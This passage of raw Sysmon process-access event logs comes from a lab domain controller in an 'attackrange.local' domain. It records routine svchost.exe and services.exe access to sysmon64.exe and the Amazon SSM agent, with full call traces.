07:53:24.356","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1490,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.356\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1116\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-00106CBC0200}\r\nTargetProcessId: 2744\r\nTargetImage: C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.356","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"1116","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-00106CBC0200}","TargetProcessId":"2744","TargetImage":"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1491,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.356\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.356","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1492,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.356\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.356","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1493,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.356\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.356","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1494,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.356\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.356","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1495,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.356\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.356","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1496,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.356\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.356","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1497,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.358\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 